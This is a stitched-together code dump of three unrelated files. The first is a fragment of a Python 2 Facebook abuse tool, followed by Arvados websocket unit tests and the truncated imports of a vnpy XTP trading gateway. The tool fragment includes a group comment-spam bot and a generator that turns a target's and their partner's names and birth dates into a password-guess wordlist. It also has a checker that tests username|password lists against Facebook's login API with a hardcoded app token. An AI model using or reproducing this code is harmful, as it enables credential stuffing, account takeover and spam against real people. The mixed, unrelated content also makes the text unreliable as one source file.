print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
 piro = 0
 for p in asus['data']:
  id = p['id']
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### MISCELLANEOUS #####
# #
#### OTHER MENU #####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
  a = raw_input("\033[1;91m[+] \033[1;92mFirst Name \033[1;97m: ")
  file = open(a+".txt", 'w')
  b=raw_input("\033[1;91m[+] \033[1;92mMiddle Name \033[1;97m: ")
  c=raw_input("\033[1;91m[+] \033[1;92mLast Name \033[1;97m: ")
  d=raw_input("\033[1;91m[+] \033[1;92mNickname \033[1;97m: ")
  e=raw_input("\033[1;91m[+] \033[1;92mDate of Birth >\033[1;96mex: |DDMMYY| \033[1;97m: ")
  f=e[0:2]
  g=e[2:4]
  h=e[4:]
  print 42*"\033[1;97m═"
  print("\033[1;91m[?] \033[1;93mIf you are single, just skip this part :v")
  i=raw_input("\033[1;91m[+] \033[1;92mPartner's Name \033[1;97m: ")
  j=raw_input("\033[1;91m[+] \033[1;92mPartner's Nickname \033[1;97m: ")
  k=raw_input("\033[1;91m[+] \033[1;92mPartner's Date of Birth >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### MY GROUPS #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
  f = open('out/Grupid.txt','w')
  for p in gud['data']:
   nama = p["name"]
   id = p["id"]
   listgrup.append(id)
   f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFILE GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
lisensi()
|
test_events.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import object
import logging
import mock
import queue
import sys
import threading
import time
import unittest
import arvados
from . import arvados_testutil as tutil
from . import run_test_server
class WebsocketTest(run_test_server.TestCaseWithServers):
MAIN_SERVER = {}
TIME_PAST = time.time()-3600
TIME_FUTURE = time.time()+3600
MOCK_WS_URL = 'wss://[{}]/'.format(tutil.TEST_HOST)
TEST_TIMEOUT = 10.0
def setUp(self):
self.ws = None
def tearDown(self):
try:
if self.ws:
self.ws.close()
except Exception as e:
print("Error in teardown: ", e)
super(WebsocketTest, self).tearDown()
run_test_server.reset()
def _test_subscribe(self, poll_fallback, expect_type, start_time=None, expected=1):
run_test_server.authorize_with('active')
events = queue.Queue(100)
# Create ancestor before subscribing.
# When listening with start_time in the past, this should also be retrieved.
# However, when start_time is omitted in subscribe, this should not be fetched.
ancestor = arvados.api('v1').humans().create(body={}).execute()
filters = [['object_uuid', 'is_a', 'arvados#human']]
if start_time:
filters.append(['created_at', '>=', start_time])
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=poll_fallback,
last_log_id=(1 if start_time else None))
self.assertIsInstance(self.ws, expect_type)
self.assertEqual(200, events.get(True, 5)['status'])
human = arvados.api('v1').humans().create(body={}).execute()
want_uuids = []
if expected > 0:
want_uuids.append(human['uuid'])
if expected > 1:
want_uuids.append(ancestor['uuid'])
log_object_uuids = []
while set(want_uuids) - set(log_object_uuids):
log_object_uuids.append(events.get(True, 5)['object_uuid'])
if expected < 2:
with self.assertRaises(queue.Empty):
# assertEqual just serves to show us what unexpected
# thing comes out of the queue when the assertRaises
# fails; when the test passes, this assertEqual
# doesn't get called.
self.assertEqual(events.get(True, 2), None)
def test_subscribe_websocket(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient, expected=1)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient, expected=1)
def test_subscribe_poll_retry(self):
api_mock = mock.MagicMock()
n = []
def on_ev(ev):
n.append(ev)
error_mock = mock.MagicMock()
error_mock.resp.status = 0
error_mock._get_reason.return_value = "testing"
api_mock.logs().list().execute.side_effect = (
arvados.errors.ApiError(error_mock, b""),
{"items": [{"id": 1}], "items_available": 1},
arvados.errors.ApiError(error_mock, b""),
{"items": [{"id": 1}], "items_available": 1},
)
pc = arvados.events.PollClient(api_mock, [], on_ev, 15, None)
pc.start()
while len(n) < 2:
time.sleep(.1)
pc.close()
def test_subscribe_websocket_with_start_time_past(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.localiso(self.TIME_PAST),
expected=2)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll_with_start_time_past(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient,
start_time=self.localiso(self.TIME_PAST),
expected=2)
def test_subscribe_websocket_with_start_time_future(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.localiso(self.TIME_FUTURE),
expected=0)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll_with_start_time_future(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient,
start_time=self.localiso(self.TIME_FUTURE),
expected=0)
def test_subscribe_websocket_with_start_time_past_utc(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.utciso(self.TIME_PAST),
expected=2)
def test_subscribe_websocket_with_start_time_future_utc(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.utciso(self.TIME_FUTURE),
expected=0)
def utciso(self, t):
return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime(t))
def localiso(self, t):
return time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(t)) + self.isotz(-time.timezone//60)
def isotz(self, offset):
"""Convert minutes-east-of-UTC to RFC3339- and ISO-compatible time zone designator"""
return '{:+03d}:{:02d}'.format(offset//60, offset%60)
    # Test websocket reconnection on (un)expected close
def _test_websocket_reconnect(self, close_unexpected):
run_test_server.authorize_with('active')
events = queue.Queue(100)
logstream = tutil.StringIO()
rootLogger = logging.getLogger()
streamHandler = logging.StreamHandler(logstream)
rootLogger.addHandler(streamHandler)
filters = [['object_uuid', 'is_a', 'arvados#human']]
filters.append(['created_at', '>=', self.localiso(self.TIME_PAST)])
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=False,
last_log_id=None)
self.assertIsInstance(self.ws, arvados.events.EventClient)
self.assertEqual(200, events.get(True, 5)['status'])
# create obj
human = arvados.api('v1').humans().create(body={}).execute()
# expect an event
self.assertIn(human['uuid'], events.get(True, 5)['object_uuid'])
with self.assertRaises(queue.Empty):
self.assertEqual(events.get(True, 2), None)
# close (im)properly
if close_unexpected:
self.ws.ec.close_connection()
else:
self.ws.close()
# create one more obj
human2 = arvados.api('v1').humans().create(body={}).execute()
# (un)expect the object creation event
if close_unexpected:
log_object_uuids = []
for i in range(0, 2):
event = events.get(True, 5)
if event.get('object_uuid') != None:
log_object_uuids.append(event['object_uuid'])
with self.assertRaises(queue.Empty):
self.assertEqual(events.get(True, 2), None)
self.assertNotIn(human['uuid'], log_object_uuids)
self.assertIn(human2['uuid'], log_object_uuids)
else:
with self.assertRaises(queue.Empty):
self.assertEqual(events.get(True, 2), None)
        # inspect the captured log output to verify whether an unexpected close was reported
log_messages = logstream.getvalue()
closeLogFound = log_messages.find("Unexpected close. Reconnecting.")
retryLogFound = log_messages.find("Error during websocket reconnect. Will retry")
if close_unexpected:
self.assertNotEqual(closeLogFound, -1)
else:
self.assertEqual(closeLogFound, -1)
rootLogger.removeHandler(streamHandler)
def test_websocket_reconnect_on_unexpected_close(self):
self._test_websocket_reconnect(True)
def test_websocket_no_reconnect_on_close_by_user(self):
self._test_websocket_reconnect(False)
# Test websocket reconnection retry
@mock.patch('arvados.events._EventClient.connect')
def test_websocket_reconnect_retry(self, event_client_connect):
event_client_connect.side_effect = [None, Exception('EventClient.connect error'), None]
logstream = tutil.StringIO()
rootLogger = logging.getLogger()
streamHandler = logging.StreamHandler(logstream)
rootLogger.addHandler(streamHandler)
run_test_server.authorize_with('active')
events = queue.Queue(100)
filters = [['object_uuid', 'is_a', 'arvados#human']]
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=False,
last_log_id=None)
self.assertIsInstance(self.ws, arvados.events.EventClient)
# simulate improper close
self.ws.on_closed()
# verify log messages to ensure retry happened
log_messages = logstream.getvalue()
found = log_messages.find("Error 'EventClient.connect error' during websocket reconnect.")
self.assertNotEqual(found, -1)
rootLogger.removeHandler(streamHandler)
@mock.patch('arvados.events._EventClient')
def test_subscribe_method(self, websocket_client):
filters = [['object_uuid', 'is_a', 'arvados#human']]
client = arvados.events.EventClient(
self.MOCK_WS_URL, [], lambda event: None, None)
client.subscribe(filters[:], 99)
websocket_client().subscribe.assert_called_with(filters, 99)
@mock.patch('arvados.events._EventClient')
def test_unsubscribe(self, websocket_client):
filters = [['object_uuid', 'is_a', 'arvados#human']]
client = arvados.events.EventClient(
self.MOCK_WS_URL, filters[:], lambda event: None, None)
client.unsubscribe(filters[:])
websocket_client().unsubscribe.assert_called_with(filters)
@mock.patch('arvados.events._EventClient')
def test_run_forever_survives_reconnects(self, websocket_client):
connected = threading.Event()
websocket_client().connect.side_effect = connected.set
client = arvados.events.EventClient(
self.MOCK_WS_URL, [], lambda event: None, None)
forever_thread = threading.Thread(target=client.run_forever)
forever_thread.start()
# Simulate an unexpected disconnect, and wait for reconnect.
close_thread = threading.Thread(target=client.on_closed)
close_thread.start()
self.assertTrue(connected.wait(timeout=self.TEST_TIMEOUT))
close_thread.join()
run_forever_alive = forever_thread.is_alive()
client.close()
forever_thread.join()
self.assertTrue(run_forever_alive)
self.assertEqual(2, websocket_client().connect.call_count)
class PollClientTestCase(unittest.TestCase):
TEST_TIMEOUT = 10.0
class MockLogs(object):
def __init__(self):
self.logs = []
self.lock = threading.Lock()
self.api_called = threading.Event()
def add(self, log):
with self.lock:
self.logs.append(log)
def return_list(self, num_retries=None):
self.api_called.set()
args, kwargs = self.list_func.call_args_list[-1]
filters = kwargs.get('filters', [])
if not any(True for f in filters if f[0] == 'id' and f[1] == '>'):
# No 'id' filter was given -- this must be the probe
# to determine the most recent id.
return {'items': [{'id': 1}], 'items_available': 1}
with self.lock:
retval = self.logs
self.logs = []
return {'items': retval, 'items_available': len(retval)}
def setUp(self):
self.logs = self.MockLogs()
self.arv = mock.MagicMock(name='arvados.api()')
self.arv.logs().list().execute.side_effect = self.logs.return_list
# our MockLogs object's "execute" stub will need to inspect
# the call history to determine X in
# ....logs().list(filters=X).execute():
self.logs.list_func = self.arv.logs().list
self.status_ok = threading.Event()
self.event_received = threading.Event()
self.recv_events = []
def tearDown(self):
if hasattr(self, 'client'):
self.client.close(timeout=None)
def callback(self, event):
if event.get('status') == 200:
self.status_ok.set()
else:
self.recv_events.append(event)
self.event_received.set()
def build_client(self, filters=None, callback=None, last_log_id=None, poll_time=99):
if filters is None:
filters = []
if callback is None:
callback = self.callback
self.client = arvados.events.PollClient(
self.arv, filters, callback, poll_time, last_log_id)
def was_filter_used(self, target):
return any(target in call[-1].get('filters', [])
for call in self.arv.logs().list.call_args_list)
def test_callback(self):
test_log = {'id': 12345, 'testkey': 'testtext'}
self.logs.add({'id': 123})
self.build_client(poll_time=.01)
self.client.start()
self.assertTrue(self.status_ok.wait(self.TEST_TIMEOUT))
self.assertTrue(self.event_received.wait(self.TEST_TIMEOUT))
self.event_received.clear()
self.logs.add(test_log.copy())
self.assertTrue(self.event_received.wait(self.TEST_TIMEOUT))
self.assertIn(test_log, self.recv_events)
def test_subscribe(self):
client_filter = ['kind', '=', 'arvados#test']
self.build_client()
self.client.unsubscribe([])
self.client.subscribe([client_filter[:]])
self.client.start()
self.assertTrue(self.status_ok.wait(self.TEST_TIMEOUT))
self.assertTrue(self.logs.api_called.wait(self.TEST_TIMEOUT))
self.assertTrue(self.was_filter_used(client_filter))
def test_unsubscribe(self):
should_filter = ['foo', '=', 'foo']
should_not_filter = ['foo', '=', 'bar']
self.build_client(poll_time=0.01)
self.client.unsubscribe([])
self.client.subscribe([should_not_filter[:]])
self.client.subscribe([should_filter[:]])
self.client.unsubscribe([should_not_filter[:]])
self.client.start()
self.logs.add({'id': 123})
self.assertTrue(self.status_ok.wait(self.TEST_TIMEOUT))
self.assertTrue(self.event_received.wait(self.TEST_TIMEOUT))
self.assertTrue(self.was_filter_used(should_filter))
self.assertFalse(self.was_filter_used(should_not_filter))
def test_run_forever(self):
self.build_client()
self.client.start()
forever_thread = threading.Thread(target=self.client.run_forever)
forever_thread.start()
self.assertTrue(self.status_ok.wait(self.TEST_TIMEOUT))
self.assertTrue(forever_thread.is_alive())
self.client.close()
forever_thread.join()
del self.client
|
xtp_gateway.py
|
from typing import Any, Sequence
from datetime import datetime
from threading import Thread
from vnpy.api.xtp.vnxtp import (
XTP,
set_async_callback_exception_handler,
AsyncDispatchException,
OrderBookStruct,
XTPMarketDataStruct,
XTPQuoteStaticInfo,
XTPRspInfoStruct,
XTPSpecificTickerStruct,
XTPTickByTickStruct,
XTPTickerPriceInfo,
XTPOrderInsertInfo,
XTPOrderInfo,
XTPTradeReport,
XTPOrderCancelInfo,
XTPCrdDebtInfo,
XTPQueryStkPositionRsp,
XTPQueryAssetRsp,
XTPStructuredFundInfo,
XTPFundTransferNotice,
XTPQueryETFBaseRsp,
XTPQueryETFComponentRsp,
XTPQueryIPOTickerRsp,
XTPQueryIPOQuotaRsp,
XTPQueryOptionAuctionInfoRsp,
XTP_EXCHANGE_TYPE,
XTP_LOG_LEVEL,
XTP_PROTOCOL_TYPE,
XTP_TE_RESUME_TYPE,
XTP_SIDE_BUY,
XTP_SIDE_SELL,
XTP_SIDE_MARGIN_TRADE,
XTP_SIDE_SHORT_SELL,
XTP_SIDE_REPAY_MARGIN,
XTP_SIDE_REPAY_STOCK,
XTP_ACCOUNT_TYPE,
XTP_BUSINESS_TYPE,
XTP_TICKER_TYPE,
XTP_MARKET_TYPE,
XTP_PRICE_TYPE,
XTP_ORDER_STATUS_TYPE
)
from vnpy.event import EventEngine
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.constant import Exchange, Product, Direction, OrderType, Status, Offset
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (CancelRequest, OrderRequest, SubscribeRequest,
